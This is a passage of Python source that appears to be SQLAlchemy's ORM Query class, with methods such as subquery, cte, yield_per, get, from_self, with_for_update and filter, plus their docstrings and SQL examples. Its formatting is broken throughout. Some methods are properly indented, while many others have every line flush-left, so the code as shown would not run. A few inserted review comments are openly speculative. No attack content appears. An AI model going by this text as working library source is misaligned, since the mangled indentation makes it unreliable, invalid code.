q.__dict__ = self.__dict__.copy()
return q
    @property
    def statement(self):
        """The full SELECT statement represented by this Query.

        The statement by default will not have disambiguating labels
        applied to the construct unless with_labels(True) is called
        first.
        """
        stmt = self._compile_context(labels=self._with_labels).\
            statement
        # re-apply any accumulated bound parameter values (self._params)
        if self._params:
            stmt = stmt.params(self._params)
        return stmt
def subquery(self, name=None, with_labels=False, reduce_columns=False):
"""return the full SELECT statement represented by
this :class:`.Query`, embedded within an :class:`.Alias`.
Eager JOIN generation within the query is disabled.
:param name: string name to be assigned as the alias;
this is passed through to :meth:`.FromClause.alias`.
If ``None``, a name will be deterministically generated
at compile time.
:param with_labels: if True, :meth:`.with_labels` will be called
on the :class:`.Query` first to apply table-qualified labels
to all columns.
:param reduce_columns: if True, :meth:`.Select.reduce_columns` will
be called on the resulting :func:`.select` construct,
to remove same-named columns where one also refers to the other
via foreign key or WHERE clause equivalence.
.. versionchanged:: 0.8 the ``with_labels`` and ``reduce_columns``
keyword arguments were added.
"""
q = self.enable_eagerloads(False)
if with_labels:
q = q.with_labels()
q = q.statement
if reduce_columns:
q = q.reduce_columns()
return q.alias(name=name)
    def cte(self, name=None, recursive=False):
        r"""Return the full SELECT statement represented by this
        :class:`.Query` represented as a common table expression (CTE).

        Parameters and usage are the same as those of the
        :meth:`.SelectBase.cte` method; see that method for
        further details.

        Here is the `PostgreSQL WITH
        RECURSIVE example
        <http://www.postgresql.org/docs/8.4/static/queries-with.html>`_.
        Note that, in this example, the ``included_parts`` cte and the
        ``incl_alias`` alias of it are Core selectables, which
        means the columns are accessed via the ``.c.`` attribute.  The
        ``parts_alias`` object is an :func:`.orm.aliased` instance of the
        ``Part`` entity, so column-mapped attributes are available
        directly::

            from sqlalchemy.orm import aliased

            class Part(Base):
                __tablename__ = 'part'
                part = Column(String, primary_key=True)
                sub_part = Column(String, primary_key=True)
                quantity = Column(Integer)

            included_parts = session.query(
                Part.sub_part,
                Part.part,
                Part.quantity).\
                filter(Part.part=="our part").\
                cte(name="included_parts", recursive=True)

            incl_alias = aliased(included_parts, name="pr")
            parts_alias = aliased(Part, name="p")
            included_parts = included_parts.union_all(
                session.query(
                    parts_alias.sub_part,
                    parts_alias.part,
                    parts_alias.quantity).\
                    filter(parts_alias.part==incl_alias.c.sub_part)
            )

            q = session.query(
                included_parts.c.sub_part,
                func.sum(included_parts.c.quantity).
                label('total_quantity')
            ).\
                group_by(included_parts.c.sub_part)

        .. seealso::

            :meth:`.HasCTE.cte`
        """
        # eager joins are disabled so the CTE contains only the core SELECT
        return self.enable_eagerloads(False).\
            statement.cte(name=name, recursive=recursive)
def label(self, name):
"""Return the full SELECT statement represented by this
:class:`.Query`, converted
to a scalar subquery with a label of the given name.
Analogous to :meth:`sqlalchemy.sql.expression.SelectBase.label`.
.. versionadded:: 0.6.5
"""
return self.enable_eagerloads(False).statement.label(name)
def as_scalar(self):
"""Return the full SELECT statement represented by this
:class:`.Query`, converted to a scalar subquery.
Analogous to :meth:`sqlalchemy.sql.expression.SelectBase.as_scalar`.
.. versionadded:: 0.6.5
"""
return self.enable_eagerloads(False).statement.as_scalar()
    @property
    def selectable(self):
        """Return the :class:`.Select` object emitted by this :class:`.Query`.

        Used for :func:`.inspect` compatibility, this is equivalent to::

            query.enable_eagerloads(False).with_labels().statement
        """
        # delegates to the clause-element protocol implementation below
        return self.__clause_element__()
def __clause_element__(self):
return self.enable_eagerloads(False).with_labels().statement
    @_generative()
    def only_return_tuples(self, value):
        """When set to True, the query results will always be a tuple,
        specifically for single element queries. The default is False.

        .. versionadded:: 1.2.5
        """
        self._only_return_tuples = value
    @_generative()
    def enable_eagerloads(self, value):
        """Control whether or not eager joins and subqueries are
        rendered.

        When set to False, the returned Query will not render
        eager joins regardless of :func:`~sqlalchemy.orm.joinedload`,
        :func:`~sqlalchemy.orm.subqueryload` options
        or mapper-level ``lazy='joined'``/``lazy='subquery'``
        configurations.

        This is used primarily when nesting the Query's
        statement into a subquery or other
        selectable, or when using :meth:`.Query.yield_per`.

        .. seealso::

            :meth:`.Query.yield_per`
        """
        self._enable_eagerloads = value
    def _no_yield_per(self, message):
        """Raise InvalidRequestError indicating that yield_per cannot be
        combined with the eager loading strategy named in ``message``."""
        raise sa_exc.InvalidRequestError(
            "The yield_per Query option is currently not "
            "compatible with %s eager loading.  Please "
            "specify lazyload('*') or query.enable_eagerloads(False) in "
            "order to "
            "proceed with query.yield_per()." % message)
    @_generative()
    def with_labels(self):
        """Apply column labels to the return value of Query.statement.

        Indicates that this Query's `statement` accessor should return
        a SELECT statement that applies labels to all columns in the
        form <tablename>_<columnname>; this is commonly used to
        disambiguate columns from multiple tables which have the same
        name.

        When the `Query` actually issues SQL to load rows, it always
        uses column labeling.

        .. note:: The :meth:`.Query.with_labels` method *only* applies
           the output of :attr:`.Query.statement`, and *not* to any of
           the result-row invoking systems of :class:`.Query` itself, e.g.
           :meth:`.Query.first`, :meth:`.Query.all`, etc.  To execute
           a query using :meth:`.Query.with_labels`, invoke the
           :attr:`.Query.statement` using :meth:`.Session.execute`::

               result = session.execute(query.with_labels().statement)
        """
        # flag is consulted by the .statement accessor when compiling
        self._with_labels = True
    @_generative()
    def enable_assertions(self, value):
        """Control whether assertions are generated.

        When set to False, the returned Query will
        not assert its state before certain operations,
        including that LIMIT/OFFSET has not been applied
        when filter() is called, no criterion exists
        when get() is called, and no "from_statement()"
        exists when filter()/order_by()/group_by() etc.
        is called.  This more permissive mode is used by
        custom Query subclasses to specify criterion or
        other modifiers outside of the usual usage patterns.

        Care should be taken to ensure that the usage
        pattern is even possible.  A statement applied
        by from_statement() will override any criterion
        set by filter() or order_by(), for example.
        """
        # consulted by the _no_*_condition / assertion helper methods
        self._enable_assertions = value
    @property
    def whereclause(self):
        """A readonly attribute which returns the current WHERE criterion for
        this Query.

        This returned value is a SQL expression construct, or ``None`` if no
        criterion has been established.
        """
        # _criterion defaults to None at the class level
        return self._criterion
    @_generative()
    def _with_current_path(self, path):
        """indicate that this query applies to objects loaded
        within a certain path.

        Used by deferred loaders (see strategies.py) which transfer
        query options from an originating query to a newly generated
        query intended for the deferred load.

        :param path: a :class:`.PathRegistry` path token.
        """
        self._current_path = path
    @_generative(_no_clauseelement_condition)
    def with_polymorphic(self,
                         cls_or_mappers,
                         selectable=None,
                         polymorphic_on=None):
        """Load columns for inheriting classes.

        :meth:`.Query.with_polymorphic` applies transformations
        to the "main" mapped class represented by this :class:`.Query`.
        The "main" mapped class here means the :class:`.Query`
        object's first argument is a full class, i.e.
        ``session.query(SomeClass)``.  These transformations allow additional
        tables to be present in the FROM clause so that columns for a
        joined-inheritance subclass are available in the query, both for the
        purposes of load-time efficiency as well as the ability to use
        these columns at query time.

        See the documentation section :ref:`with_polymorphic` for
        details on how this method is used.

        .. versionchanged:: 0.8
            A new and more flexible function
            :func:`.orm.with_polymorphic` supersedes
            :meth:`.Query.with_polymorphic`, as it can apply the equivalent
            functionality to any set of columns or classes in the
            :class:`.Query`, not just the "zero mapper".  See that
            function for a description of arguments.
        """
        if not self._primary_entity:
            raise sa_exc.InvalidRequestError(
                "No primary mapper set up for this Query.")
        # replace the primary entity with a copy carrying the
        # with_polymorphic settings; remaining entities are unchanged
        entity = self._entities[0]._clone()
        self._entities = [entity] + self._entities[1:]
        entity.set_with_polymorphic(self,
                                    cls_or_mappers,
                                    selectable=selectable,
                                    polymorphic_on=polymorphic_on)
    @_generative()
    def yield_per(self, count):
        r"""Yield only ``count`` rows at a time.

        The purpose of this method is when fetching very large result sets
        (> 10K rows), to batch results in sub-collections and yield them
        out partially, so that the Python interpreter doesn't need to declare
        very large areas of memory which is both time consuming and leads
        to excessive memory use.   The performance from fetching hundreds of
        thousands of rows can often double when a suitable yield-per setting
        (e.g. approximately 1000) is used, even with DBAPIs that buffer
        rows (which are most).

        The :meth:`.Query.yield_per` method **is not compatible with
        subqueryload eager loading or joinedload eager loading when
        using collections**.  It is potentially compatible with "select in"
        eager loading, **provided the database driver supports multiple,
        independent cursors** (pysqlite and psycopg2 are known to work,
        MySQL and SQL Server ODBC drivers do not).

        Therefore in some cases, it may be helpful to disable
        eager loads, either unconditionally with
        :meth:`.Query.enable_eagerloads`::

            q = sess.query(Object).yield_per(100).enable_eagerloads(False)

        Or more selectively using :func:`.lazyload`; such as with
        an asterisk to specify the default loader scheme::

            q = sess.query(Object).yield_per(100).\
                options(lazyload('*'), joinedload(Object.some_related))

        .. warning::

            Use this method with caution; if the same instance is
            present in more than one batch of rows, end-user changes
            to attributes will be overwritten.

            In particular, it's usually impossible to use this setting
            with eagerly loaded collections (i.e. any lazy='joined' or
            'subquery') since those collections will be cleared for a
            new load when encountered in a subsequent result batch.
            In the case of 'subquery' loading, the full result for all
            rows is fetched which generally defeats the purpose of
            :meth:`~sqlalchemy.orm.query.Query.yield_per`.

            Also note that while
            :meth:`~sqlalchemy.orm.query.Query.yield_per` will set the
            ``stream_results`` execution option to True, currently
            this is only understood by
            :mod:`~sqlalchemy.dialects.postgresql.psycopg2`,
            :mod:`~sqlalchemy.dialects.mysql.mysqldb` and
            :mod:`~sqlalchemy.dialects.mysql.pymysql` dialects
            which will stream results using server side cursors
            instead of pre-buffer all rows for this query. Other
            DBAPIs **pre-buffer all rows** before making them
            available.  The memory use of raw database rows is much less
            than that of an ORM-mapped object, but should still be taken into
            consideration when benchmarking.

        .. seealso::

            :meth:`.Query.enable_eagerloads`
        """
        self._yield_per = count
        # streaming hint plus buffer sizing for dialects that honor it
        self._execution_options = self._execution_options.union(
            {"stream_results": True,
             "max_row_buffer": count})
    def get(self, ident):
        """Return an instance based on the given primary key identifier,
        or ``None`` if not found.

        E.g.::

            my_user = session.query(User).get(5)

            some_object = session.query(VersionedFoo).get((5, 10))

        :meth:`~.Query.get` is special in that it provides direct
        access to the identity map of the owning :class:`.Session`.
        If the given primary key identifier is present
        in the local identity map, the object is returned
        directly from this collection and no SQL is emitted,
        unless the object has been marked fully expired.
        If not present,
        a SELECT is performed in order to locate the object.

        :meth:`~.Query.get` also will perform a check if
        the object is present in the identity map and
        marked as expired - a SELECT
        is emitted to refresh the object as well as to
        ensure that the row is still present.
        If not, :class:`~sqlalchemy.orm.exc.ObjectDeletedError` is raised.

        :meth:`~.Query.get` is only used to return a single
        mapped instance, not multiple instances or
        individual column constructs, and strictly
        on a single primary key value.  The originating
        :class:`.Query` must be constructed in this way,
        i.e. against a single mapped entity,
        with no additional filtering criterion.  Loading
        options via :meth:`~.Query.options` may be applied
        however, and will be used if the object is not
        yet locally present.

        A lazy-loading, many-to-one attribute configured
        by :func:`.relationship`, using a simple
        foreign-key-to-primary-key criterion, will also use an
        operation equivalent to :meth:`~.Query.get` in order to retrieve
        the target value from the local identity map
        before querying the database.  See :doc:`/orm/loading_relationships`
        for further details on relationship loading.

        :param ident: A scalar or tuple value representing
         the primary key.  For a composite primary key,
         the order of identifiers corresponds in most cases
         to that of the mapped :class:`.Table` object's
         primary key columns.  For a :func:`.mapper` that
         was given the ``primary_key`` argument during
         construction, the order of identifiers corresponds
         to the elements present in this collection.

        :return: The object instance, or ``None``.

        """
        return self._get_impl(
            ident, loading.load_on_pk_identity)
    def _identity_lookup(self, mapper, primary_key_identity,
                         identity_token=None, passive=attributes.PASSIVE_OFF,
                         lazy_loaded_from=None):
        """Locate an object in the identity map.

        Given a primary key identity, constructs an identity key and then
        looks in the session's identity map.  If present, the object may
        be run through unexpiration rules (e.g. load unloaded attributes,
        check if was deleted).

        For performance reasons, while the :class:`.Query` must be
        instantiated, it may be instantiated with no entities, and the
        mapper is passed::

            obj = session.query()._identity_lookup(inspect(SomeClass), (1, ))

        :param mapper: mapper in use
        :param primary_key_identity: the primary key we are searching for, as
         a tuple.
        :param identity_token: identity token that should be used to create
         the identity key.  Used as is, however overriding subclasses can
         repurpose this in order to interpret the value in a special way,
         such as if None then look among multiple target tokens.
        :param passive: passive load flag passed to
         :func:`.loading.get_from_identity`, which impacts the behavior if
         the object is found; the object may be validated and/or unexpired
         if the flag allows for SQL to be emitted.
        :param lazy_loaded_from: an :class:`.InstanceState` that is
         specifically asking for this identity as a related identity.  Used
         for sharding schemes where there is a correspondence between an object
         and a related object being lazy-loaded (or otherwise
         relationship-loaded).

         .. versionadded:: 1.2.9

        :return: None if the object is not found in the identity map, *or*
         if the object was unexpired and found to have been deleted.
         if passive flags disallow SQL and the object is expired, returns
         PASSIVE_NO_RESULT.  In all other cases the instance is returned.

        .. versionadded:: 1.2.7

        """
        # NOTE: ``lazy_loaded_from`` is not consulted by this base
        # implementation; per the docstring it exists as a hook for
        # overriding subclasses (e.g. horizontal sharding).
        key = mapper.identity_key_from_primary_key(
            primary_key_identity, identity_token=identity_token)
        return loading.get_from_identity(
            self.session, key, passive)
    def _get_impl(
            self, primary_key_identity, db_load_fn, identity_token=None):
        """Shared implementation for ``get()``: consult the identity map
        first where allowed, otherwise load via ``db_load_fn``.
        """
        # convert composite types to individual args
        if hasattr(primary_key_identity, '__composite_values__'):
            primary_key_identity = primary_key_identity.__composite_values__()
        primary_key_identity = util.to_list(primary_key_identity)
        mapper = self._only_full_mapper_zero("get")
        # the identity must supply exactly one value per primary key column
        if len(primary_key_identity) != len(mapper.primary_key):
            raise sa_exc.InvalidRequestError(
                "Incorrect number of values in identifier to formulate "
                "primary key for query.get(); primary key columns are %s" %
                ','.join("'%s'" % c for c in mapper.primary_key))
        # The identity map may only be consulted when nothing forces a
        # round trip to the database (populate_existing, mapper-level
        # always_refresh, or a FOR UPDATE clause).
        if not self._populate_existing and \
                not mapper.always_refresh and \
                self._for_update_arg is None:
            instance = self._identity_lookup(
                mapper, primary_key_identity,
                identity_token=identity_token)
            if instance is not None:
                # NOTE(review): presumably validates that this Query has no
                # criterion/options incompatible with an identity-map hit —
                # confirm against _get_existing_condition's definition
                self._get_existing_condition()
                # reject calls for id in identity map but class
                # mismatch.
                if not issubclass(instance.__class__, mapper.class_):
                    return None
                return instance
        return db_load_fn(self, primary_key_identity)
@_generative()
def correlate(self, *args):
"""Return a :class:`.Query` construct which will correlate the given
FROM clauses to that of an enclosing :class:`.Query` or
:func:`~.expression.select`.
The method here accepts mapped classes, :func:`.aliased` constructs,
and :func:`.mapper` constructs as arguments, which are resolved into
expression constructs, in addition to appropriate expression
constructs.
The correlation arguments are ultimately passed to
:meth:`.Select.correlate` after coercion to expression constructs.
The correlation arguments take effect in such cases
as when :meth:`.Query.from_self` is used, or when
a subquery as returned by :meth:`.Query.subquery` is
embedded in another :func:`~.expression.select` construct.
"""
for s in args:
if s is None:
self._correlate = self._correlate.union([None])
else:
self._correlate = self._correlate.union(
sql_util.surface_selectables(_interpret_as_from(s))
)
@_generative()
def autoflush(self, setting):
"""Return a Query with a specific 'autoflush' setting.
Note that a Session with autoflush=False will
not autoflush, even if this flag is set to True at the
Query level. Therefore this flag is usually used only
to disable autoflush for a specific Query.
"""
self._autoflush = setting
@_generative()
def populate_existing(self):
"""Return a :class:`.Query` that will expire and refresh all instances
as they are loaded, or reused from the current :class:`.Session`.
:meth:`.populate_existing` does not improve behavior when
the ORM is used normally - the :class:`.Session` object's usual
behavior of maintaining a transaction and expiring all attributes
after rollback or commit handles object state automatically.
This method is not intended for general use.
"""
self._populate_existing = True
@_generative()
def _with_invoke_all_eagers(self, value):
"""Set the 'invoke all eagers' flag which causes joined- and
subquery loaders to traverse into already-loaded related objects
and collections.
Default is that of :attr:`.Query._invoke_all_eagers`.
"""
self._invoke_all_eagers = value
def with_parent(self, instance, property=None, from_entity=None):
"""Add filtering criterion that relates the given instance
to a child object or collection, using its attribute state
as well as an established :func:`.relationship()`
configuration.
The method uses the :func:`.with_parent` function to generate
the clause, the result of which is passed to :meth:`.Query.filter`.
Parameters are the same as :func:`.with_parent`, with the exception
that the given property can be None, in which case a search is
performed against this :class:`.Query` object's target mapper.
:param instance:
An instance which has some :func:`.relationship`.
:param property:
String property name, or class-bound attribute, which indicates
what relationship from the instance should be used to reconcile the
parent/child relationship.
:param from_entity:
Entity in which to consider as the left side. This defaults to the
"zero" entity of the :class:`.Query` itself.
"""
if from_entity:
entity_zero = inspect(from_entity)
else:
entity_zero = self._entity_zero()
if property is None:
mapper = object_mapper(instance)
for prop in mapper.iterate_properties:
if isinstance(prop, properties.RelationshipProperty) and \
prop.mapper is entity_zero.mapper:
property = prop
break
else:
raise sa_exc.InvalidRequestError(
"Could not locate a property which relates instances "
"of class '%s' to instances of class '%s'" %
(
entity_zero.mapper.class_.__name__,
instance.__class__.__name__)
)
return self.filter(with_parent(instance, property, entity_zero.entity))
@_generative()
def add_entity(self, entity, alias=None):
"""add a mapped entity to the list of result columns
to be returned."""
if alias is not None:
entity = aliased(entity, alias)
self._entities = list(self._entities)
m = _MapperEntity(self, entity)
self._set_entity_selectables([m])
@_generative()
def with_session(self, session):
"""Return a :class:`.Query` that will use the given :class:`.Session`.
While the :class:`.Query` object is normally instantiated using the
:meth:`.Session.query` method, it is legal to build the :class:`.Query`
directly without necessarily using a :class:`.Session`. Such a
:class:`.Query` object, or any :class:`.Query` already associated
with a different :class:`.Session`, can produce a new :class:`.Query`
object associated with a target session using this method::
from sqlalchemy.orm import Query
query = Query([MyClass]).filter(MyClass.id == 5)
result = query.with_session(my_session).one()
"""
self.session = session
def from_self(self, *entities):
r"""return a Query that selects from this Query's
SELECT statement.
:meth:`.Query.from_self` essentially turns the SELECT statement
into a SELECT of itself. Given a query such as::
q = session.query(User).filter(User.name.like('e%'))
Given the :meth:`.Query.from_self` version::
q = session.query(User).filter(User.name.like('e%')).from_self()
This query renders as:
.. sourcecode:: sql
SELECT anon_1.user_id AS anon_1_user_id,
anon_1.user_name AS anon_1_user_name
FROM (SELECT "user".id AS user_id, "user".name AS user_name
FROM "user"
WHERE "user".name LIKE :name_1) AS anon_1
There are lots of cases where :meth:`.Query.from_self` may be useful.
A simple one is where above, we may want to apply a row LIMIT to
the set of user objects we query against, and then apply additional
joins against that row-limited set::
q = session.query(User).filter(User.name.like('e%')).\
limit(5).from_self().\
join(User.addresses).filter(Address.email.like('q%'))
The above query joins to the ``Address`` entity but only against the
first five results of the ``User`` query:
.. sourcecode:: sql
SELECT anon_1.user_id AS anon_1_user_id,
anon_1.user_name AS anon_1_user_name
FROM (SELECT "user".id AS user_id, "user".name AS user_name
FROM "user"
WHERE "user".name LIKE :name_1
LIMIT :param_1) AS anon_1
JOIN address ON anon_1.user_id = address.user_id
WHERE address.email LIKE :email_1
**Automatic Aliasing**
Another key behavior of :meth:`.Query.from_self` is that it applies
**automatic aliasing** to the entities inside the subquery, when
they are referenced on the outside. Above, if we continue to
refer to the ``User`` entity without any additional aliasing applied
to it, those references wil be in terms of the subquery::
q = session.query(User).filter(User.name.like('e%')).\
limit(5).from_self().\
join(User.addresses).filter(Address.email.like('q%')).\
order_by(User.name)
The ORDER BY against ``User.name`` is aliased to be in terms of the
inner subquery:
.. sourcecode:: sql
SELECT anon_1.user_id AS anon_1_user_id,
anon_1.user_name AS anon_1_user_name
FROM (SELECT "user".id AS user_id, "user".name AS user_name
FROM "user"
WHERE "user".name LIKE :name_1
LIMIT :param_1) AS anon_1
JOIN address ON anon_1.user_id = address.user_id
WHERE address.email LIKE :email_1 ORDER BY anon_1.user_name
The automatic aliasing feature only works in a **limited** way,
for simple filters and orderings. More ambitious constructions
such as referring to the entity in joins should prefer to use
explicit subquery objects, typically making use of the
:meth:`.Query.subquery` method to produce an explicit subquery object.
Always test the structure of queries by viewing the SQL to ensure
a particular structure does what's expected!
**Changing the Entities**
:meth:`.Query.from_self` also includes the ability to modify what
columns are being queried. In our example, we want ``User.id``
to be queried by the inner query, so that we can join to the
``Address`` entity on the outside, but we only wanted the outer
query to return the ``Address.email`` column::
q = session.query(User).filter(User.name.like('e%')).\
limit(5).from_self(Address.email).\
join(User.addresses).filter(Address.email.like('q%'))
yielding:
.. sourcecode:: sql
SELECT address.email AS address_email
FROM (SELECT "user".id AS user_id, "user".name AS user_name
FROM "user"
WHERE "user".name LIKE :name_1
LIMIT :param_1) AS anon_1
JOIN address ON anon_1.user_id = address.user_id
WHERE address.email LIKE :email_1
**Looking out for Inner / Outer Columns**
Keep in mind that when referring to columns that originate from
inside the subquery, we need to ensure they are present in the
columns clause of the subquery itself; this is an ordinary aspect of
SQL. For example, if we wanted to load from a joined entity inside
the subquery using :func:`.contains_eager`, we need to add those
columns. Below illustrates a join of ``Address`` to ``User``,
then a subquery, and then we'd like :func:`.contains_eager` to access
the ``User`` columns::
q = session.query(Address).join(Address.user).\
filter(User.name.like('e%'))
q = q.add_entity(User).from_self().\
options(contains_eager(Address.user))
We use :meth:`.Query.add_entity` above **before** we call
:meth:`.Query.from_self` so that the ``User`` columns are present
in the inner subquery, so that they are available to the
:func:`.contains_eager` modifier we are using on the outside,
producing:
.. sourcecode:: sql
SELECT anon_1.address_id AS anon_1_address_id,
anon_1.address_email AS anon_1_address_email,
anon_1.address_user_id AS anon_1_address_user_id,
anon_1.user_id AS anon_1_user_id,
anon_1.user_name AS anon_1_user_name
FROM (
SELECT address.id AS address_id,
address.email AS address_email,
address.user_id AS address_user_id,
"user".id AS user_id,
"user".name AS user_name
FROM address JOIN "user" ON "user".id = address.user_id
WHERE "user".name LIKE :name_1) AS anon_1
If we didn't call ``add_entity(User)``, but still asked
:func:`.contains_eager` to load the ``User`` entity, it would be
forced to add the table on the outside without the correct
join criteria - note the ``anon1, "user"`` phrase at
the end:
.. sourcecode:: sql
-- incorrect query
SELECT anon_1.address_id AS anon_1_address_id,
anon_1.address_email AS anon_1_address_email,
anon_1.address_user_id AS anon_1_address_user_id,
"user".id AS user_id,
"user".name AS user_name
FROM (
SELECT address.id AS address_id,
address.email AS address_email,
address.user_id AS address_user_id
FROM address JOIN "user" ON "user".id = address.user_id
WHERE "user".name LIKE :name_1) AS anon_1, "user"
:param \*entities: optional list of entities which will replace
those being selected.
"""
fromclause = self.with_labels().enable_eagerloads(False).\
statement.correlate(None)
q = self._from_selectable(fromclause)
q._enable_single_crit = False
q._select_from_entity = self._entity_zero()
if entities:
q._set_entities(entities)
return q
    @_generative()
    def _set_enable_single_crit(self, val):
        # Toggle the _enable_single_crit flag; NOTE(review): presumably
        # controls single-table-inheritance criteria during compilation —
        # confirm where the flag is consumed
        self._enable_single_crit = val
    @_generative()
    def _from_selectable(self, fromclause):
        # Discard all per-query state that was computed against the previous
        # FROM; the new selectable supersedes it entirely.
        for attr in (
                '_statement', '_criterion',
                '_order_by', '_group_by',
                '_limit', '_offset',
                '_joinpath', '_joinpoint',
                '_distinct', '_having',
                '_prefixes', '_suffixes'
        ):
            self.__dict__.pop(attr, None)
        self._set_select_from([fromclause], True)
        # this enables clause adaptation for non-ORM
        # expressions.
        self._orm_only_from_obj_alias = False
        # re-point every existing entity at the new from-object
        old_entities = self._entities
        self._entities = []
        for e in old_entities:
            e.adapt_to_selectable(self, self._from_obj[0])
def values(self, *columns):
"""Return an iterator yielding result tuples corresponding
to the given list of columns"""
if not columns:
return iter(())
q = self._clone()
q._set_entities(columns, entity_wrapper=_ColumnEntity)
if not q._yield_per:
q._yield_per = 10
return iter(q)
_values = values
def value(self, column):
"""Return a scalar result corresponding to the given
column expression."""
try:
return next(self.values(column))[0]
except StopIteration:
return None
@_generative()
def with_entities(self, *entities):
r"""Return a new :class:`.Query` replacing the SELECT list with the
given entities.
e.g.::
# Users, filtered on some arbitrary criterion
# and then ordered by related email address
q = session.query(User).\
join(User.address).\
filter(User.name.like('%ed%')).\
order_by(Address.email)
# given *only* User.id==5, Address.email, and 'q', what
# would the *next* User in the result be ?
subq = q.with_entities(Address.email).\
order_by(None).\
filter(User.id==5).\
subquery()
q = q.join((subq, subq.c.email < Address.email)).\
limit(1)
.. versionadded:: 0.6.5
"""
self._set_entities(entities)
@_generative()
def add_columns(self, *column):
"""Add one or more column expressions to the list
of result columns to be returned."""
self._entities = list(self._entities)
l = len(self._entities)
for c in column:
_ColumnEntity(self, c)
# _ColumnEntity may add many entities if the
# given arg is a FROM clause
self._set_entity_selectables(self._entities[l:])
    @util.pending_deprecation("0.7",
                              ":meth:`.add_column` is superseded "
                              "by :meth:`.add_columns`",
                              False)
    def add_column(self, column):
        """Add a column expression to the list of result columns to be
        returned.

        Pending deprecation: :meth:`.add_column` will be superseded by
        :meth:`.add_columns`.
        """
        # single-column convenience wrapper; delegates directly
        return self.add_columns(column)
def options(self, *args):
"""Return a new Query object, applying the given list of
mapper options.
Most supplied options regard changing how column- and
relationship-mapped attributes are loaded. See the sections
:ref:`deferred` and :doc:`/orm/loading_relationships` for reference
documentation.
"""
return self._options(False, *args)
    def _conditional_options(self, *args):
        # like options(), but each option is applied via its
        # process_query_conditionally() path
        return self._options(True, *args)
@_generative()
def _options(self, conditional, *args):
# most MapperOptions write to the '_attributes' dictionary,
# so copy that as well
self._attributes = self._attributes.copy()
if '_unbound_load_dedupes' not in self._attributes:
self._attributes['_unbound_load_dedupes'] = set()
opts = tuple(util.flatten_iterator(args))
self._with_options = self._with_options + opts
if conditional:
for opt in opts:
opt.process_query_conditionally(self)
else:
for opt in opts:
opt.process_query(self)
def with_transformation(self, fn):
"""Return a new :class:`.Query` object transformed by
the given function.
E.g.::
def filter_something(criterion):
def transform(q):
return q.filter(criterion)
return transform
q = q.with_transformation(filter_something(x==5))
This allows ad-hoc recipes to be created for :class:`.Query`
objects. See the example at :ref:`hybrid_transformers`.
.. versionadded:: 0.7.4
"""
return fn(self)
@_generative()
def with_hint(self, selectable, text, dialect_name='*'):
"""Add an indexing or other executional context
hint for the given entity or selectable to
this :class:`.Query`.
Functionality is passed straight through to
:meth:`~sqlalchemy.sql.expression.Select.with_hint`,
with the addition that ``selectable`` can be a
:class:`.Table`, :class:`.Alias`, or ORM entity / mapped class
/etc.
.. seealso::
:meth:`.Query.with_statement_hint`
"""
if selectable is not None:
selectable = inspect(selectable).selectable
self._with_hints += ((selectable, text, dialect_name),)
def with_statement_hint(self, text, dialect_name='*'):
"""add a statement hint to this :class:`.Select`.
This method is similar to :meth:`.Select.with_hint` except that
it does not require an individual table, and instead applies to the
statement as a whole.
This feature calls down into :meth:`.Select.with_statement_hint`.
.. versionadded:: 1.0.0
.. seealso::
:meth:`.Query.with_hint`
"""
return self.with_hint(None, text, dialect_name)
@_generative()
def execution_options(self, **kwargs):
""" Set non-SQL options which take effect during execution.
The options are the same as those accepted by
:meth:`.Connection.execution_options`.
Note that the ``stream_results`` execution option is enabled
automatically if the :meth:`~sqlalchemy.orm.query.Query.yield_per()`
method is used.
"""
self._execution_options = self._execution_options.union(kwargs)
@_generative()
def with_lockmode(self, mode):
"""Return a new :class:`.Query` object with the specified "locking mode",
which essentially refers to the ``FOR UPDATE`` clause.
.. deprecated:: 0.9.0 superseded by :meth:`.Query.with_for_update`.
:param mode: a string representing the desired locking mode.
Valid values are:
* ``None`` - translates to no lockmode
* ``'update'`` - translates to ``FOR UPDATE``
(standard SQL, supported by most dialects)
* ``'update_nowait'`` - translates to ``FOR UPDATE NOWAIT``
(supported by Oracle, PostgreSQL 8.1 upwards)
* ``'read'`` - translates to ``LOCK IN SHARE MODE`` (for MySQL),
and ``FOR SHARE`` (for PostgreSQL)
.. seealso::
:meth:`.Query.with_for_update` - improved API for
specifying the ``FOR UPDATE`` clause.
"""
self._for_update_arg = LockmodeArg.parse_legacy_query(mode)
@_generative()
def with_for_update(self, read=False, nowait=False, of=None,
skip_locked=False, key_share=False):
"""return a new :class:`.Query` with the specified options for the
``FOR UPDATE`` clause.
The behavior of this method is identical to that of
:meth:`.SelectBase.with_for_update`. When called with no arguments,
the resulting ``SELECT`` statement will have a ``FOR UPDATE`` clause
appended. When additional arguments are specified, backend-specific
options such as ``FOR UPDATE NOWAIT`` or ``LOCK IN SHARE MODE``
can take effect.
E.g.::
q = sess.query(User).with_for_update(nowait=True, of=User)
The above query on a PostgreSQL backend will render like::
SELECT users.id AS users_id FROM users FOR UPDATE OF users NOWAIT
.. versionadded:: 0.9.0 :meth:`.Query.with_for_update` supersedes
the :meth:`.Query.with_lockmode` method.
.. seealso::
:meth:`.GenerativeSelect.with_for_update` - Core level method with
full argument and behavioral description.
"""
self._for_update_arg = LockmodeArg(read=read, nowait=nowait, of=of,
skip_locked=skip_locked,
key_share=key_share)
@_generative()
def params(self, *args, **kwargs):
r"""add values for bind parameters which may have been
specified in filter().
parameters may be specified using \**kwargs, or optionally a single
dictionary as the first positional argument. The reason for both is
that \**kwargs is convenient, however some parameter dictionaries
contain unicode keys in which case \**kwargs cannot be used.
"""
if len(args) == 1:
kwargs.update(args[0])
elif len(args) > 0:
raise sa_exc.ArgumentError(
"params() takes zero or one positional argument, "
"which is a dictionary.")
self._params = self._params.copy()
self._params.update(kwargs)
@_generative(_no_statement_condition, _no_limit_offset)
def filter(self, *criterion):
r"""apply the given filtering criterion to a copy
of this :class:`.Query`, using SQL expressions.
e.g.::
session.query(MyClass).filter(MyClass.name == 'some name')
Multiple criteria may be specified as comma separated; the effect
is that they will be joined together using the :func:`.and_`
function::
session.query(MyClass).\
filter(MyClass.name == 'some name', MyClass.id > 5)
The criterion is any SQL expression object applicable to the
WHERE clause of a select. String expressions are coerced
into SQL expression constructs via the :func:`.text` construct.
.. seealso::
:meth:`.Query.filter_by` - filter on keyword expressions.
"""
for criterion in list(criterion):
criterion = expression._expression_literal_as_text(criterion)
criterion = self._adapt_clause(criterion, True, True)
if self._criterion is not None:
self._criterion = self._criterion & criterion
else:
self._criterion = criterion
def filter_by(self, **kwargs):
r"""apply the given filtering criterion to a copy
of this :class:`.Query`, using keyword expressions.
e.g.::
session.query(MyClass).filter_by(name = 'some name')
Multiple criteria may be specified as comma separated; the effect
is that they will be joined together using the :func:`.and_`
function::
session.query(MyClass).\
